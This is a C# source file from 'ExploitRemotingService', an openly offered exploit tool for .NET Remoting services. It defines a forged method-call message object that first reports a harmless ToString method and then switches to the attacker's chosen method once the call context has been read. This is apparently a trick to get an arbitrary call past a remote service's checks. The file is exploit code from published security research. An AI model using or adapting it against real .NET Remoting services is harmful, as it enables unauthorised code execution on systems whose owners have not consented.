﻿//    ExploitRemotingService
//    Copyright (C) 2014 James Forshaw
//
//    This program is free software: you can redistribute it and/or modify
//    it under the terms of the GNU General Public License as published by
//    the Free Software Foundation, either version 3 of the License, or
//    (at your option) any later version.
//
//    This program is distributed in the hope that it will be useful,
//    but WITHOUT ANY WARRANTY; without even the implied warranty of
//    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
//    GNU General Public License for more details.
//
//    You should have received a copy of the GNU General Public License
//    along with this program.  If not, see <http://www.gnu.org/licenses/>.

using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Runtime.Remoting.Messaging;

namespace ExploitRemotingService
{
    [ComVisible(true)]
    public class FakeMessage : MarshalByRefObject, IMethodCallMessage
    {
        string _uri;
        object[] _args;
        MethodBase _method;
        bool _sendmethod;

        public FakeMessage(string uri, MethodBase method, object[] args)
        {
            _uri = uri;
            _method = method;
            _args = args;
        }

        public System.Collections.IDictionary Properties
        {
            get
            {
                TraceMethodCall(MethodInfo.GetCurrentMethod());
                Dictionary<object, object> o = new Dictionary<object, object>();

                return o;
            }
        }

        public object GetInArg(int argNum)
        {
            TraceMethodCall(MethodInfo.GetCurrentMethod());
            return "Unknown";
        }

        public string GetInArgName(int index)
        {
            TraceMethodCall(MethodInfo.GetCurrentMethod());
            return "Unknown";
        }

        public int InArgCount
        {
            get { TraceMethodCall(MethodInfo.GetCurrentMethod()); return 0; }
        }

        public object[] InArgs
        {
            get { TraceMethodCall(MethodInfo.GetCurrentMethod()); return new object[0]; }
        }

        public int ArgCount
        {
            get { TraceMethodCall(MethodInfo.GetCurrentMethod()); return _args.Length; }
        }

        public object[] Args
        {
            get
            {
                TraceMethodCall(MethodInfo.GetCurrentMethod());

                Trace.WriteLine(String.Format("Send Args: ({0})", String.Join(",", _args.Select(o => o.ToString()).ToArray())));

                return _args;
            }
        }

        public object GetArg(int argNum)
        {
            TraceMethodCall(MethodInfo.GetCurrentMethod());
            return "Unknown";
        }

        public string GetArgName(int index)
        {
            TraceMethodCall(MethodInfo.GetCurrentMethod());

            return "Unknown";
        }

        public bool HasVarArgs
        {
            get
            {
                TraceMethodCall(MethodInfo.GetCurrentMethod());
                return false;
            }
        }

        public LogicalCallContext LogicalCallContext
        {
            get
            {
                TraceMethodCall(MethodInfo.GetCurrentMethod());

                _sendmethod = true;

                return (LogicalCallContext)Activator.CreateInstance(typeof(LogicalCallContext), true);
            }
        }

        //private int count = 0;

        private static void TraceMethodCall(MethodBase mi)
        {
            Trace.WriteLine(String.Format("Calling: {0}", mi.Name));
        }

        public System.Reflection.MethodBase MethodBase
        {
            get
            {
                TraceMethodCall(MethodInfo.GetCurrentMethod());

                if(!_sendmethod)
                {
                    Trace.WriteLine("Sending ToString");                    
                    return typeof(object).GetMethod("ToString");
                }
                else
                {
                    Trace.WriteLine(String.Format("Sending {0} method", _method.Name));                    
                    return _method;
                }                
            }
        }

        public string MethodName
        {
            get
            {
                TraceMethodCall(MethodInfo.GetCurrentMethod());
                return "badger";
            }
        }

        public object MethodSignature
        {
            get
            {
                TraceMethodCall(MethodInfo.GetCurrentMethod());
                return new object();
            }
        }

        public string TypeName
        {
            get
            {
                TraceMethodCall(MethodInfo.GetCurrentMethod());
                return "badger";
            }
        }

        public string Uri
        {
            get
            {
                TraceMethodCall(MethodInfo.GetCurrentMethod());

                // If logicalcallcontext retrieved but we called Uri first reset send
                _sendmethod = false;

                return _uri;
            }
        }
    }
}
